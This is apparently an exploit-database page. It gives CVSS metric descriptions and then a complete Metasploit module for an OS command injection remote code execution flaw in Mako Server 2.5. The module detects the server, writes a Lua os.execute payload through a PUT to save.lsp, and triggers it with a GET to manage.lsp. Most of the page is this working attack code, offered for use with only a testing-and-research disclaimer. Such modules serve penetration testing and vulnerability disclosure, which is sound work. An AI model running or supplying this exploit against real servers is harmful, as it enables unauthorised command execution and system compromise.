The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
None
C
There is no impact on the confidentiality of the system; the attacker does not gain the ability to read any data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
None
A
There is no impact on the availability of the system; the attacker does not have the ability to disrupt access to or use of the system.
Below is a copy: Mako Server 2.5 OS Command Injection Remote Command Execution
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Mako Server v2.5 OS Command Injection RCE',
'Description' => %q{
This module exploits a vulnerability found in Mako Server v2.5.
It's possible to inject arbitrary OS commands in the Mako Server
tutorial page through a PUT request to save.lsp.
Attacker input will be saved on the victims machine and can
be executed by sending a GET request to manage.lsp.
},
'License' => MSF_LICENSE,
'Author' =>
[
'John Page (hyp3rlinx) - Beyond Security SecuriTeam Secure Disclosure', # Vulnerability discovery & PoC
'Steven Patterson (Shogun Lab) <steven[at]shogunlab.com>' # Metasploit module
],
'References' =>
[
['EDB', '42683'],
['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
],
'Arch' => ARCH_CMD,
'Platform' => 'win',
'Targets' =>
[
['Mako Server v2.5 - Windows x86/x64', { }]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Sep 3 2017'))
register_options(
[
OptString.new('URI', [true, 'URI path to the Mako Server app', '/'])
]
)
end
def check
vprint_status('Trying to detect running Mako Server and necessary files...')
# Send GET request to determine existence of save.lsp page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp')
}, 20)
# If response does not include "MakoServer.net", target is not viable.
if res.headers['Server'] !~ /MakoServer.net/
vprint_warning('Target is not a Mako Server.')
return CheckCode::Safe
end
if res.body
if res.body =~ /Incorrect usage/
# We are able to determine that the server has a save.lsp page and
# returns the correct output.
vprint_status('Mako Server save.lsp returns correct ouput.')
return CheckCode::Appears
else
# The page exists, but is not returning the expected output.
# May be a different version?
vprint_warning('Mako Server save.lsp did not return expected output.')
return CheckCode::Detected
end
else
# The above checks failed and exploitability could not be determined.
vprint_error('Unable to determine exploitability, save.lsp not found.')
return CheckCode::Unknown
end
return CheckCode::Safe
end
def exploit
print_status('Sending payload to target...')
# The double square brackets helps to ensure single/double quotes
# in cmd payload do not interfere with syntax of os.execute Lua function.
cmd = %{os.execute([[#{payload.encoded}]])}
# If users want to troubleshoot their cmd payloads, they can see the
# Lua function with params that the module uses in a more verbose mode.
vprint_status("Now executing the following command: #{cmd}")
# Send a PUT request to save.lsp with command payload
begin
vprint_status('Sending PUT request to save.lsp...')
send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(datastore['URI'], 'examples/save.lsp?ex=2.1'),
'ctype' => 'text/plain',
'data' => cmd,
'http' => {
'X-Requested-With' => 'XMLHttpRequest',
'Referer' => 'http://localhost/Lua-Types.lsp'
}
}, 20)
rescue StandardError => e
fail_with(Failure::NoAccess, "Error: #{e}")
end
# Send a GET request to manage.lsp with execute set to true
begin
vprint_status('Sending GET request to manage.lsp...')
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['URI'], 'examples/manage.lsp?execute=true&ex=2.1&type=lua')
}, 20)
rescue StandardError => e
fail_with(Failure::NoAccess, "Error: #{e}")
end
end
end
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum